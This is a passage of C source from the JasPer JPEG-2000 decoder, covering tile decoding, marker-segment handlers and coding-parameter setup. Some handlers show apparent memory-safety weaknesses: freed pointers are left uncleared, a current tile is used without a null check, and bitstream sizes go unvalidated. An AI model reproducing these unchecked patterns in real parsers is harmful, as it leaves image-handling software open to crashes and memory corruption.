}
}
}
if (tile->cp) {
jpc_dec_cp_destroy(tile->cp);
//tile->cp = 0;
}
if (tile->tcomps) {
jas_free(tile->tcomps);
//tile->tcomps = 0;
}
if (tile->pi) {
jpc_pi_destroy(tile->pi);
//tile->pi = 0;
}
if (tile->pkthdrstream) {
jas_stream_close(tile->pkthdrstream);
//tile->pkthdrstream = 0;
}
if (tile->pptstab) {
jpc_ppxstab_destroy(tile->pptstab);
//tile->pptstab = 0;
}
tile->state = JPC_TILE_DONE;
return 0;
}
static int jpc_dec_tiledecode(jpc_dec_t *dec, jpc_dec_tile_t *tile)
{
int i;
int j;
jpc_dec_tcomp_t *tcomp;
jpc_dec_rlvl_t *rlvl;
jpc_dec_band_t *band;
int compno;
int rlvlno;
int bandno;
int adjust;
int v;
jpc_dec_ccp_t *ccp;
jpc_dec_cmpt_t *cmpt;
if (jpc_dec_decodecblks(dec, tile)) {
jas_eprintf("jpc_dec_decodecblks failed\n");
return -1;
}
/* Perform dequantization. */
for (compno = 0, tcomp = tile->tcomps; compno < dec->numcomps;
++compno, ++tcomp) {
ccp = &tile->cp->ccps[compno];
for (rlvlno = 0, rlvl = tcomp->rlvls; rlvlno < tcomp->numrlvls;
++rlvlno, ++rlvl) {
if (!rlvl->bands) {
continue;
}
for (bandno = 0, band = rlvl->bands;
bandno < rlvl->numbands; ++bandno, ++band) {
if (!band->data) {
continue;
}
jpc_undo_roi(band->data, band->roishift, ccp->roishift -
band->roishift, band->numbps);
if (tile->realmode) {
jas_matrix_asl(band->data, JPC_FIX_FRACBITS);
jpc_dequantize(band->data, band->absstepsize);
}
}
}
}
/* Apply an inverse wavelet transform if necessary. */
for (compno = 0, tcomp = tile->tcomps; compno < dec->numcomps;
++compno, ++tcomp) {
ccp = &tile->cp->ccps[compno];
jpc_tsfb_synthesize(tcomp->tsfb, tcomp->data);
}
/* Apply an inverse intercomponent transform if necessary. */
switch (tile->cp->mctid) {
case JPC_MCT_RCT:
if (dec->numcomps < 3) {
jas_eprintf("RCT requires at least three components\n");
return -1;
}
jpc_irct(tile->tcomps[0].data, tile->tcomps[1].data,
tile->tcomps[2].data);
break;
case JPC_MCT_ICT:
if (dec->numcomps < 3) {
jas_eprintf("ICT requires at least three components\n");
return -1;
}
jpc_iict(tile->tcomps[0].data, tile->tcomps[1].data,
tile->tcomps[2].data);
break;
}
/* Perform rounding and convert to integer values. */
if (tile->realmode) {
for (compno = 0, tcomp = tile->tcomps; compno < dec->numcomps;
++compno, ++tcomp) {
for (i = 0; i < jas_matrix_numrows(tcomp->data); ++i) {
for (j = 0; j < jas_matrix_numcols(tcomp->data); ++j) {
v = jas_matrix_get(tcomp->data, i, j);
v = jpc_fix_round(v);
jas_matrix_set(tcomp->data, i, j, jpc_fixtoint(v));
}
}
}
}
/* Perform level shift. */
for (compno = 0, tcomp = tile->tcomps, cmpt = dec->cmpts; compno <
dec->numcomps; ++compno, ++tcomp, ++cmpt) {
adjust = cmpt->sgnd ? 0 : (1 << (cmpt->prec - 1));
for (i = 0; i < jas_matrix_numrows(tcomp->data); ++i) {
for (j = 0; j < jas_matrix_numcols(tcomp->data); ++j) {
*jas_matrix_getref(tcomp->data, i, j) += adjust;
}
}
}
/* Perform clipping. */
for (compno = 0, tcomp = tile->tcomps, cmpt = dec->cmpts; compno <
dec->numcomps; ++compno, ++tcomp, ++cmpt) {
jpc_fix_t mn;
jpc_fix_t mx;
mn = cmpt->sgnd ? (-(1 << (cmpt->prec - 1))) : (0);
mx = cmpt->sgnd ? ((1 << (cmpt->prec - 1)) - 1) : ((1 <<
cmpt->prec) - 1);
jas_matrix_clip(tcomp->data, mn, mx);
}
/* XXX need to free tsfb struct */
/* Write the data for each component of the image. */
for (compno = 0, tcomp = tile->tcomps, cmpt = dec->cmpts; compno <
dec->numcomps; ++compno, ++tcomp, ++cmpt) {
if (jas_image_writecmpt(dec->image, compno, tcomp->xstart -
JPC_CEILDIV(dec->xstart, cmpt->hstep), tcomp->ystart -
JPC_CEILDIV(dec->ystart, cmpt->vstep), jas_matrix_numcols(
tcomp->data), jas_matrix_numrows(tcomp->data), tcomp->data)) {
jas_eprintf("write component failed\n");
return -1;
}
}
return 0;
}
static int jpc_dec_process_eoc(jpc_dec_t *dec, jpc_ms_t *ms)
{
int tileno;
jpc_dec_tile_t *tile;
/* Eliminate compiler warnings about unused variables. */
ms = 0;
for (tileno = 0, tile = dec->tiles; tileno < dec->numtiles; ++tileno,
++tile) {
if (tile->state == JPC_TILE_ACTIVE) {
if (jpc_dec_tiledecode(dec, tile)) {
return -1;
}
}
/* If the tile has not yet been finalized, finalize it. */
// OLD CODE: jpc_dec_tilefini(dec, tile);
if (tile->state != JPC_TILE_DONE) {
jpc_dec_tilefini(dec, tile);
}
}
/* We are done processing the code stream. */
dec->state = JPC_MT;
return 1;
}
static int jpc_dec_process_siz(jpc_dec_t *dec, jpc_ms_t *ms)
{
jpc_siz_t *siz = &ms->parms.siz;
int compno;
int tileno;
jpc_dec_tile_t *tile;
jpc_dec_tcomp_t *tcomp;
int htileno;
int vtileno;
jpc_dec_cmpt_t *cmpt;
size_t size;
dec->xstart = siz->xoff;
dec->ystart = siz->yoff;
dec->xend = siz->width;
dec->yend = siz->height;
dec->tilewidth = siz->tilewidth;
dec->tileheight = siz->tileheight;
dec->tilexoff = siz->tilexoff;
dec->tileyoff = siz->tileyoff;
dec->numcomps = siz->numcomps;
if (!(dec->cp = jpc_dec_cp_create(dec->numcomps))) {
return -1;
}
if (!(dec->cmpts = jas_alloc2(dec->numcomps, sizeof(jpc_dec_cmpt_t)))) {
return -1;
}
for (compno = 0, cmpt = dec->cmpts; compno < dec->numcomps; ++compno,
++cmpt) {
cmpt->prec = siz->comps[compno].prec;
cmpt->sgnd = siz->comps[compno].sgnd;
cmpt->hstep = siz->comps[compno].hsamp;
cmpt->vstep = siz->comps[compno].vsamp;
cmpt->width = JPC_CEILDIV(dec->xend, cmpt->hstep) -
JPC_CEILDIV(dec->xstart, cmpt->hstep);
cmpt->height = JPC_CEILDIV(dec->yend, cmpt->vstep) -
JPC_CEILDIV(dec->ystart, cmpt->vstep);
cmpt->hsubstep = 0;
cmpt->vsubstep = 0;
}
dec->image = 0;
dec->numhtiles = JPC_CEILDIV(dec->xend - dec->tilexoff, dec->tilewidth);
dec->numvtiles = JPC_CEILDIV(dec->yend - dec->tileyoff, dec->tileheight);
if (!jas_safe_size_mul(dec->numhtiles, dec->numvtiles, &size)) {
return -1;
}
dec->numtiles = size;
JAS_DBGLOG(10, ("numtiles = %d; numhtiles = %d; numvtiles = %d;\n",
dec->numtiles, dec->numhtiles, dec->numvtiles));
if (!(dec->tiles = jas_alloc2(dec->numtiles, sizeof(jpc_dec_tile_t)))) {
return -1;
}
for (tileno = 0, tile = dec->tiles; tileno < dec->numtiles; ++tileno,
++tile) {
htileno = tileno % dec->numhtiles;
vtileno = tileno / dec->numhtiles;
tile->realmode = 0;
tile->state = JPC_TILE_INIT;
tile->xstart = JAS_MAX(dec->tilexoff + htileno * dec->tilewidth,
dec->xstart);
tile->ystart = JAS_MAX(dec->tileyoff + vtileno * dec->tileheight,
dec->ystart);
tile->xend = JAS_MIN(dec->tilexoff + (htileno + 1) *
dec->tilewidth, dec->xend);
tile->yend = JAS_MIN(dec->tileyoff + (vtileno + 1) *
dec->tileheight, dec->yend);
tile->numparts = 0;
tile->partno = 0;
tile->pkthdrstream = 0;
tile->pkthdrstreampos = 0;
tile->pptstab = 0;
tile->cp = 0;
tile->pi = 0;
if (!(tile->tcomps = jas_alloc2(dec->numcomps,
sizeof(jpc_dec_tcomp_t)))) {
return -1;
}
for (compno = 0, cmpt = dec->cmpts, tcomp = tile->tcomps;
compno < dec->numcomps; ++compno, ++cmpt, ++tcomp) {
tcomp->rlvls = 0;
tcomp->numrlvls = 0;
tcomp->data = 0;
tcomp->xstart = JPC_CEILDIV(tile->xstart, cmpt->hstep);
tcomp->ystart = JPC_CEILDIV(tile->ystart, cmpt->vstep);
tcomp->xend = JPC_CEILDIV(tile->xend, cmpt->hstep);
tcomp->yend = JPC_CEILDIV(tile->yend, cmpt->vstep);
tcomp->tsfb = 0;
}
}
dec->pkthdrstreams = 0;
/* We should expect to encounter other main header marker segments
or an SOT marker segment next. */
dec->state = JPC_MH;
return 0;
}
static int jpc_dec_process_cod(jpc_dec_t *dec, jpc_ms_t *ms)
{
jpc_cod_t *cod = &ms->parms.cod;
jpc_dec_tile_t *tile;
switch (dec->state) {
case JPC_MH:
jpc_dec_cp_setfromcod(dec->cp, cod);
break;
case JPC_TPH:
if (!(tile = dec->curtile)) {
return -1;
}
if (tile->partno != 0) {
return -1;
}
jpc_dec_cp_setfromcod(tile->cp, cod);
break;
}
return 0;
}
static int jpc_dec_process_coc(jpc_dec_t *dec, jpc_ms_t *ms)
{
jpc_coc_t *coc = &ms->parms.coc;
jpc_dec_tile_t *tile;
if (JAS_CAST(int, coc->compno) >= dec->numcomps) {
jas_eprintf("invalid component number in COC marker segment\n");
return -1;
}
switch (dec->state) {
case JPC_MH:
jpc_dec_cp_setfromcoc(dec->cp, coc);
break;
case JPC_TPH:
if (!(tile = dec->curtile)) {
return -1;
}
if (tile->partno > 0) {
return -1;
}
jpc_dec_cp_setfromcoc(tile->cp, coc);
break;
}
return 0;
}
static int jpc_dec_process_rgn(jpc_dec_t *dec, jpc_ms_t *ms)
{
jpc_rgn_t *rgn = &ms->parms.rgn;
jpc_dec_tile_t *tile;
if (JAS_CAST(int, rgn->compno) >= dec->numcomps) {
jas_eprintf("invalid component number in RGN marker segment\n");
return -1;
}
switch (dec->state) {
case JPC_MH:
jpc_dec_cp_setfromrgn(dec->cp, rgn);
break;
case JPC_TPH:
if (!(tile = dec->curtile)) {
return -1;
}
if (tile->partno > 0) {
return -1;
}
jpc_dec_cp_setfromrgn(tile->cp, rgn);
break;
}
return 0;
}
static int jpc_dec_process_qcd(jpc_dec_t *dec, jpc_ms_t *ms)
{
jpc_qcd_t *qcd = &ms->parms.qcd;
jpc_dec_tile_t *tile;
switch (dec->state) {
case JPC_MH:
jpc_dec_cp_setfromqcd(dec->cp, qcd);
break;
case JPC_TPH:
if (!(tile = dec->curtile)) {
return -1;
}
if (tile->partno > 0) {
return -1;
}
jpc_dec_cp_setfromqcd(tile->cp, qcd);
break;
}
return 0;
}
static int jpc_dec_process_qcc(jpc_dec_t *dec, jpc_ms_t *ms)
{
jpc_qcc_t *qcc = &ms->parms.qcc;
jpc_dec_tile_t *tile;
if (JAS_CAST(int, qcc->compno) >= dec->numcomps) {
jas_eprintf("invalid component number in QCC marker segment\n");
return -1;
}
switch (dec->state) {
case JPC_MH:
jpc_dec_cp_setfromqcc(dec->cp, qcc);
break;
case JPC_TPH:
if (!(tile = dec->curtile)) {
return -1;
}
if (tile->partno > 0) {
return -1;
}
jpc_dec_cp_setfromqcc(tile->cp, qcc);
break;
}
return 0;
}
static int jpc_dec_process_poc(jpc_dec_t *dec, jpc_ms_t *ms)
{
jpc_poc_t *poc = &ms->parms.poc;
jpc_dec_tile_t *tile;
switch (dec->state) {
case JPC_MH:
if (jpc_dec_cp_setfrompoc(dec->cp, poc, 1)) {
return -1;
}
break;
case JPC_TPH:
if (!(tile = dec->curtile)) {
return -1;
}
if (!tile->partno) {
if (jpc_dec_cp_setfrompoc(tile->cp, poc, (!tile->partno))) {
return -1;
}
} else {
jpc_pi_addpchgfrompoc(tile->pi, poc);
}
break;
}
return 0;
}
static int jpc_dec_process_ppm(jpc_dec_t *dec, jpc_ms_t *ms)
{
jpc_ppm_t *ppm = &ms->parms.ppm;
jpc_ppxstabent_t *ppmstabent;
if (!dec->ppmstab) {
if (!(dec->ppmstab = jpc_ppxstab_create())) {
return -1;
}
}
if (!(ppmstabent = jpc_ppxstabent_create())) {
return -1;
}
ppmstabent->ind = ppm->ind;
ppmstabent->data = ppm->data;
ppm->data = 0;
ppmstabent->len = ppm->len;
if (jpc_ppxstab_insert(dec->ppmstab, ppmstabent)) {
return -1;
}
return 0;
}
static int jpc_dec_process_ppt(jpc_dec_t *dec, jpc_ms_t *ms)
{
jpc_ppt_t *ppt = &ms->parms.ppt;
jpc_dec_tile_t *tile;
jpc_ppxstabent_t *pptstabent;
tile = dec->curtile;
if (!tile->pptstab) {
if (!(tile->pptstab = jpc_ppxstab_create())) {
return -1;
}
}
if (!(pptstabent = jpc_ppxstabent_create())) {
return -1;
}
pptstabent->ind = ppt->ind;
pptstabent->data = ppt->data;
ppt->data = 0;
pptstabent->len = ppt->len;
if (jpc_ppxstab_insert(tile->pptstab, pptstabent)) {
return -1;
}
return 0;
}
static int jpc_dec_process_com(jpc_dec_t *dec, jpc_ms_t *ms)
{
/* Eliminate compiler warnings about unused variables. */
dec = 0;
ms = 0;
return 0;
}
static int jpc_dec_process_unk(jpc_dec_t *dec, jpc_ms_t *ms)
{
/* Eliminate compiler warnings about unused variables. */
dec = 0;
jas_eprintf("warning: ignoring unknown marker segment\n");
jpc_ms_dump(ms, stderr);
return 0;
}
/******************************************************************************\
*
\******************************************************************************/
static jpc_dec_cp_t *jpc_dec_cp_create(uint_fast16_t numcomps)
{
jpc_dec_cp_t *cp;
jpc_dec_ccp_t *ccp;
int compno;
if (!(cp = jas_malloc(sizeof(jpc_dec_cp_t)))) {
return 0;
}
cp->flags = 0;
cp->numcomps = numcomps;
cp->prgord = 0;
cp->numlyrs = 0;
cp->mctid = 0;
cp->csty = 0;
if (!(cp->ccps = jas_alloc2(cp->numcomps, sizeof(jpc_dec_ccp_t)))) {
goto error;
}
if (!(cp->pchglist = jpc_pchglist_create())) {
goto error;
}
for (compno = 0, ccp = cp->ccps; compno < cp->numcomps;
++compno, ++ccp) {
ccp->flags = 0;
ccp->numrlvls = 0;
ccp->cblkwidthexpn = 0;
ccp->cblkheightexpn = 0;
ccp->qmfbid = 0;
ccp->numstepsizes = 0;
ccp->numguardbits = 0;
ccp->roishift = 0;
ccp->cblkctx = 0;
}
return cp;
error:
if (cp) {
jpc_dec_cp_destroy(cp);
}
return 0;
}
static jpc_dec_cp_t *jpc_dec_cp_copy(jpc_dec_cp_t *cp)
{
jpc_dec_cp_t *newcp;
jpc_dec_ccp_t *newccp;
jpc_dec_ccp_t *ccp;
int compno;
if (!(newcp = jpc_dec_cp_create(cp->numcomps))) {
return 0;
}
newcp->flags = cp->flags;
newcp->prgord = cp->prgord;
newcp->numlyrs = cp->numlyrs;
newcp->mctid = cp->mctid;
newcp->csty = cp->csty;
jpc_pchglist_destroy(newcp->pchglist);
newcp->pchglist = 0;
if (!(newcp->pchglist = jpc_pchglist_copy(cp->pchglist))) {
jas_free(newcp);
return 0;
}
for (compno = 0, newccp = newcp->ccps, ccp = cp->ccps;
compno < cp->numcomps;
++compno, ++newccp, ++ccp) {
*newccp = *ccp;
}
return newcp;
}
static void jpc_dec_cp_resetflags(jpc_dec_cp_t *cp)
{
int compno;
jpc_dec_ccp_t *ccp;
cp->flags &= (JPC_CSET | JPC_QSET);
for (compno = 0, ccp = cp->ccps; compno < cp->numcomps;
++compno, ++ccp) {
ccp->flags = 0;
}
}
static void jpc_dec_cp_destroy(jpc_dec_cp_t *cp)
{
if (cp->ccps) {
jas_free(cp->ccps);
}
if (cp->pchglist) {
jpc_pchglist_destroy(cp->pchglist);
}
jas_free(cp);
}
static int jpc_dec_cp_isvalid(jpc_dec_cp_t *cp)
{
uint_fast16_t compcnt;
jpc_dec_ccp_t *ccp;
if (!(cp->flags & JPC_CSET) || !(cp->flags & JPC_QSET)) {
return 0;
}
for (compcnt = cp->numcomps, ccp = cp->ccps; compcnt > 0; --compcnt,
++ccp) {
/* Is there enough step sizes for the number of bands? */
if ((ccp->qsty != JPC_QCX_SIQNT && JAS_CAST(int, ccp->numstepsizes) < 3 *
ccp->numrlvls - 2) || (ccp->qsty == JPC_QCX_SIQNT &&
ccp->numstepsizes != 1)) {
return 0;
}
}
return 1;
}
static void calcstepsizes(uint_fast16_t refstepsize, int numrlvls,
uint_fast16_t *stepsizes)
{
int bandno;
int numbands;
uint_fast16_t expn;
uint_fast16_t mant;
expn = JPC_QCX_GETEXPN(refstepsize);
mant = JPC_QCX_GETMANT(refstepsize);
numbands = 3 * numrlvls - 2;
for (bandno = 0; bandno < numbands; ++bandno) {
stepsizes[bandno] = JPC_QCX_MANT(mant) | JPC_QCX_EXPN(expn +
(numrlvls - 1) - (numrlvls - 1 - ((bandno > 0) ? ((bandno + 2) / 3) : (0))));
}
}
static int jpc_dec_cp_prepare(jpc_dec_cp_t *cp)
{
jpc_dec_ccp_t *ccp;
int compno;
int i;
for (compno = 0, ccp = cp->ccps; compno < cp->numcomps;
++compno, ++ccp) {
if (!(ccp->csty & JPC_COX_PRT)) {
for (i = 0; i < JPC_MAXRLVLS; ++i) {
ccp->prcwidthexpns[i] = 15;
ccp->prcheightexpns[i] = 15;
}
}
if (ccp->qsty == JPC_QCX_SIQNT) {
calcstepsizes(ccp->stepsizes[0], ccp->numrlvls, ccp->stepsizes);
}
}
return 0;
}
static int jpc_dec_cp_setfromcod(jpc_dec_cp_t *cp, jpc_cod_t *cod)
{
jpc_dec_ccp_t *ccp;
int compno;
cp->flags |= JPC_CSET;
cp->prgord = cod->prg;
if (cod->mctrans) {
cp->mctid = (cod->compparms.qmfbid == JPC_COX_INS) ? (JPC_MCT_ICT) : (JPC_MCT_RCT);
} else {
cp->mctid = JPC_MCT_NONE;
}
cp->numlyrs = cod->numlyrs;
cp->csty = cod->csty & (JPC_COD_SOP | JPC_COD_EPH);
for (compno = 0, ccp = cp->ccps; compno < cp->numcomps;
++compno, ++ccp) {
jpc_dec_cp_setfromcox(cp, ccp, &cod->compparms, 0);
}
cp->flags |= JPC_CSET;
return 0;
}
static int jpc_dec_cp_setfromcoc(jpc_dec_cp_t *cp, jpc_coc_t *coc)
{
jpc_dec_cp_setfromcox(cp, &cp->ccps[coc->compno], &coc->compparms, JPC_COC);
return 0;
}
static int jpc_dec_cp_setfromcox(jpc_dec_cp_t *cp, jpc_dec_ccp_t *ccp,
jpc_coxcp_t *compparms, int flags)
{
int rlvlno;
/* Eliminate compiler warnings about unused variables. */
cp = 0;
if ((flags & JPC_COC) || !(ccp->flags & JPC_COC)) {
ccp->numrlvls = compparms->numdlvls + 1;
ccp->cblkwidthexpn = JPC_COX_GETCBLKSIZEEXPN(
compparms->cblkwidthval);
ccp->cblkheightexpn = JPC_COX_GETCBLKSIZEEXPN(
compparms->cblkheightval);
ccp->qmfbid = compparms->qmfbid;
ccp->cblkctx = compparms->cblksty;
ccp->csty = compparms->csty & JPC_COX_PRT;
for (rlvlno = 0; rlvlno < compparms->numrlvls; ++rlvlno) {
ccp->prcwidthexpns[rlvlno] =
compparms->rlvls[rlvlno].parwidthval;
ccp->prcheightexpns[rlvlno] =
compparms->rlvls[rlvlno].parheightval;
}
ccp->flags |= flags | JPC_CSET;
}
return 0;
}
static int jpc_dec_cp_setfromqcd(jpc_dec_cp_t *cp, jpc_qcd_t *qcd)
{
int compno;
jpc_dec_ccp_t *ccp;
for (compno = 0, ccp = cp->ccps; compno < cp->numcomps;
++compno, ++ccp) {
jpc_dec_cp_setfromqcx(cp, ccp, &qcd->compparms, 0);
}
cp->flags |= JPC_QSET;
return 0;
}
static int jpc_dec_cp_setfromqcc(jpc_dec_cp_t *cp, jpc_qcc_t *qcc)
{
return jpc_dec_cp_setfromqcx(cp, &cp->ccps[qcc->compno], &qcc->compparms, JPC_QCC);
}
static int jpc_dec_cp_setfromqcx(jpc_dec_cp_t *cp, jpc_dec_ccp_t *ccp,
jpc_qcxcp_t *compparms, int flags)
{
int bandno;
/* Eliminate compiler warnings about unused variables. */
cp = 0;
if ((flags & JPC_QCC) || !(ccp->flags & JPC_QCC)) {
ccp->flags |= flags | JPC_QSET;
for (bandno = 0; bandno < compparms->numstepsizes; ++bandno) {
ccp->stepsizes[bandno] = compparms->stepsizes[bandno];
}
ccp->numstepsizes = compparms->numstepsizes;
ccp->numguardbits = compparms->numguard;
ccp->qsty = compparms->qntsty;
}
return 0;
}
static int jpc_dec_cp_setfromrgn(jpc_dec_cp_t *cp, jpc_rgn_t *rgn)
{
jpc_dec_ccp_t *ccp;
ccp = &cp->ccps[rgn->compno];
ccp->roishift = rgn->roishift;
return 0;
}
static int jpc_pi_addpchgfrompoc(jpc_pi_t *pi, jpc_poc_t *poc)
{
int pchgno;
jpc_pchg_t *pchg;
for (pchgno = 0; pchgno < poc->numpchgs; ++pchgno) {
if (!(pchg = jpc_pchg_copy(&poc->pchgs[pchgno]))) {
return -1;
}
if (jpc_pchglist_insert(pi->pchglist, -1, pchg)) {
return -1;
}
}
return 0;
}
static int jpc_dec_cp_setfrompoc(jpc_dec_cp_t *cp, jpc_poc_t *poc, int reset)
{
int pchgno;
jpc_pchg_t *pchg;
if (reset) {
while (jpc_pchglist_numpchgs(cp->pchglist) > 0) {
pchg = jpc_pchglist_remove(cp->pchglist, 0);
jpc_pchg_destroy(pchg);
}
}
for (pchgno = 0; pchgno < poc->numpchgs; ++pchgno) {
if (!(pchg = jpc_pchg_copy(&poc->pchgs[pchgno]))) {
return -1;
}
if (jpc_pchglist_insert(cp->pchglist, -1, pchg)) {
return -1;
}
}
return 0;
}
static jpc_fix_t jpc_calcabsstepsize(int stepsize, int numbits)
{
jpc_fix_t absstepsize;
int n;
absstepsize = jpc_inttofix(1);
n = JPC_FIX_FRACBITS - 11;
absstepsize |= (n >= 0) ? (JPC_QCX_GETMANT(stepsize) << n) :
(JPC_QCX_GETMANT(stepsize) >> (-n));
n = numbits - JPC_QCX_GETEXPN(stepsize);
absstepsize = (n >= 0) ? (absstepsize << n) : (absstepsize >> (-n));
return absstepsize;
}
static void jpc_dequantize(jas_matrix_t *x, jpc_fix_t absstepsize)
{
int i;
int j;
int t;
assert(absstepsize >= 0);
if (absstepsize == jpc_inttofix(1)) {
return;
}
for (i = 0; i < jas_matrix_numrows(x); ++i) {
for (j = 0; j < jas_matrix_numcols(x); ++j) {
t = jas_matrix_get(x, i, j);
if (t) {
t = jpc_fix_mul(t, absstepsize);
} else {
t = 0;
}
jas_matrix_set(x, i, j, t);
}
}
}
static void jpc_undo_roi(jas_matrix_t *x, int roishift, int bgshift, int numbps)
{
int i;
int j;
int thresh;
jpc_fix_t val;
jpc_fix_t mag;
bool warn;
uint_fast32_t mask;
if (roishift < 0) {
/* We could instead return an error here. */
/* I do not think it matters much. */
jas_eprintf("warning: forcing negative ROI shift to zero "
"(bitstream is probably corrupt)\n");
roishift = 0;
}
if (roishift == 0 && bgshift == 0) {
return;
}
thresh = 1 << roishift;
warn = false;
for (i = 0; i < jas_matrix_numrows(x); ++i) {
for (j = 0; j < jas_matrix_numcols(x); ++j) {
val = jas_matrix_get(x, i, j);
mag = JAS_ABS(val);
if (mag >= thresh) {
/* We are dealing with ROI data. */
mag >>= roishift;
val = (val < 0) ? (-mag) : mag;
jas_matrix_set(x, i, j, val);
} else {
/* We are dealing with non-ROI (i.e., background) data. */
mag <<= bgshift;
mask = (JAS_CAST(uint_fast32_t, 1) << numbps) - 1;
/* Perform a basic sanity check on the sample value. */
/* Some implementations write garbage in the unused
most-significant bit planes introduced by ROI shifting.
Here we ensure that any such bits are masked off. */
if (mag & (~mask)) {
if (!warn) {
jas_eprintf("warning: possibly corrupt code stream\n");
warn = true;
}
mag &= mask;
}
val = (val < 0) ? (-mag) : mag;
jas_matrix_set(x, i, j, val);
}
}
}
}
static jpc_dec_t *jpc_dec_create(jpc_dec_importopts_t *impopts, jas_stream_t *in)
{
jpc_dec_t *dec;
if (!(dec = jas_malloc(sizeof(jpc_dec_t)))) {
return 0;
}
dec->image = 0;
dec->xstart = 0;
dec->ystart = 0;
dec->xend = 0;
dec->yend = 0;
dec->tilewidth = 0;
dec->tileheight = 0;
dec->tilexoff = 0;
dec->tileyoff = 0;
dec->numhtiles = 0;
dec->numvtiles = 0;
dec->numtiles = 0;
dec->tiles = 0;
dec->curtile = 0;
dec->numcomps = 0;
dec->in = in;
dec->cp = 0;
dec->maxlyrs = impopts->maxlyrs;
dec->maxpkts = impopts->maxpkts;
dec->numpkts = 0;
dec->ppmseqno = 0;
dec->state = 0;
dec->cmpts = 0;
dec->pkthdrstreams = 0;
dec->ppmstab = 0;
dec->curtileendoff = 0;
return dec;
}
static void jpc_dec_destroy(jpc_dec_t *dec)
{
if (dec->cstate) {
jpc_cstate_destroy(dec->cstate);
}
if (dec->pkthdrstreams) {
jpc_streamlist_destroy(dec->pkthdrstreams);
}
if (dec->image) {
jas_image_destroy(dec->image);
}
if (dec->cp) {
jpc_dec_cp_destroy(dec->cp);
}
if (dec->cmpts) {
jas_free(dec->cmpts);
}
if (dec->tiles) {
jas_free(dec->tiles);
}
jas_free(dec);
}
/******************************************************************************\
*
\******************************************************************************/
void jpc_seglist_insert(jpc_dec_seglist_t *list, jpc_dec_seg_t *ins, jpc_dec_seg_t *node)
{
jpc_dec_seg_t *prev;
jpc_dec_seg_t *next;
prev = ins;
node->prev = prev;
next = prev ? (prev->next) : 0;
node->prev = prev;
node->next = next;
if (prev) {
prev->next = node;
} else {
list->head = node;
}
if (next) {
next->prev = node;
} else {
list->tail = node;
}
}
void jpc_seglist_remove(jpc_dec_seglist_t *list, jpc_dec_seg_t *seg)
{
jpc_dec_seg_t *prev;
jpc_dec_seg_t *next;
prev = seg->prev;
next = seg->next;
if (prev) {
prev->next = next;
} else {
list->head = next;
}
if (next) {
next->prev = prev;
} else {
list->tail = prev;
}
seg->prev = 0;
seg->next = 0;
}
jpc_dec_seg_t *jpc_seg_alloc()
{
jpc_dec_seg_t *seg;
if (!(seg = jas_malloc(sizeof(jpc_dec_seg_t)))) {
return 0;
}
seg->prev = 0;
seg->next = 0;
seg->passno = -1;
seg->numpasses = 0;
seg->maxpasses = 0;
seg->type = JPC_SEG_INVALID;
seg->stream = 0;
seg->cnt = 0;
seg->complete = 0;
seg->lyrno = -1;
return seg;
}
void jpc_seg_destroy(jpc_dec_seg_t *seg)
{
if (seg->stream) {
jas_stream_close(seg->stream);
}
jas_free(seg);
}
static int jpc_dec_dump(jpc_dec_t *dec, FILE *out)
{
jpc_dec_tile_t *tile;
int tileno;
jpc_dec_tcomp_t *tcomp;
int compno;
jpc_dec_rlvl_t *rlvl;
int rlvlno;
jpc_dec_band_t *band;
int bandno;
jpc_dec_prc_t *prc;
int prcno;
jpc_dec_cblk_t *cblk;
int cblkno;
for (tileno = 0, tile = dec->tiles; tileno < dec->numtiles;
++tileno, ++tile) {
for (compno = 0, tcomp = tile->tcomps; compno < dec->numcomps;
++compno, ++tcomp) {
for (rlvlno = 0, rlvl = tcomp->rlvls; rlvlno <
tcomp->numrlvls; ++rlvlno, ++rlvl) {
fprintf(out, "RESOLUTION LEVEL %d\n", rlvlno);
fprintf(out, "xs =%"PRIuFAST32", ys = %"PRIuFAST32", xe = %"PRIuFAST32", ye = %"PRIuFAST32", w = %"PRIuFAST32", h = %"PRIuFAST32"\n",
rlvl->xstart, rlvl->ystart, rlvl->xend, rlvl->yend, rlvl->xend -
rlvl->xstart, rlvl->yend - rlvl->ystart);
for (bandno = 0, band = rlvl->bands;
bandno < rlvl->numbands; ++bandno, ++band) {
fprintf(out, "BAND %d\n", bandno);
fprintf(out, "xs =%"PRIiFAST32", ys = %"PRIiFAST32", xe = %"PRIiFAST32", ye = %"PRIiFAST32", w = %"PRIiFAST32", h = %"PRIiFAST32"\n",
jas_seq2d_xstart(band->data), jas_seq2d_ystart(band->data), jas_seq2d_xend(band->data),
jas_seq2d_yend(band->data), jas_seq2d_xend(band->data) - jas_seq2d_xstart(band->data),
jas_seq2d_yend(band->data) - jas_seq2d_ystart(band->data));
for (prcno = 0, prc = band->prcs;
prcno < rlvl->numprcs; ++prcno,
++prc) {
fprintf(out, "CODE BLOCK GROUP %d\n", prcno);
fprintf(out, "xs =%"PRIuFAST32", ys = %"PRIuFAST32", xe = %"PRIuFAST32", ye = %"PRIuFAST32", w = %"PRIuFAST32", h = %"PRIuFAST32"\n",
prc->xstart, prc->ystart, prc->xend, prc->yend, prc->xend -
prc->xstart, prc->yend - prc->ystart);
for (cblkno = 0, cblk =
prc->cblks; cblkno <
prc->numcblks; ++cblkno,
++cblk) {
fprintf(out, "CODE BLOCK %d\n", cblkno);
fprintf(out, "xs =%"PRIiFAST32", ys = %"PRIiFAST32", xe = %"PRIiFAST32", ye = %"PRIiFAST32", w = %"PRIiFAST32", h = %"PRIiFAST32"\n",
jas_seq2d_xstart(cblk->data), jas_seq2d_ystart(cblk->data), jas_seq2d_xend(cblk->data),
jas_seq2d_yend(cblk->data), jas_seq2d_xend(cblk->data) - jas_seq2d_xstart(cblk->data),
jas_seq2d_yend(cblk->data) - jas_seq2d_ystart(cblk->data));
}
}
}
}
}
}
return 0;
}
jpc_streamlist_t *jpc_streamlist_create()
{
jpc_streamlist_t *streamlist;
int i;
if (!(streamlist = jas_malloc(sizeof(jpc_streamlist_t)))) {
return 0;
}
streamlist->numstreams = 0;
streamlist->maxstreams = 100;
if (!(streamlist->streams = jas_alloc2(streamlist->maxstreams,
sizeof(jas_stream_t *)))) {
jas_free(streamlist);
return 0;
}
for (i = 0; i < streamlist->maxstreams; ++i) {
streamlist->streams[i] = 0;
}
return streamlist;
}
int jpc_streamlist_insert(jpc_streamlist_t *streamlist, int streamno,
jas_stream_t *stream)
{
jas_stream_t **newstreams;
int newmaxstreams;
int i;
/* Grow the array of streams if necessary. */
if (streamlist->numstreams >= streamlist->maxstreams) {
newmaxstreams = streamlist->maxstreams + 1024;
if (!(newstreams = jas_realloc2(streamlist->streams,
(newmaxstreams + 1024), sizeof(jas_stream_t *)))) {
return -1;
}
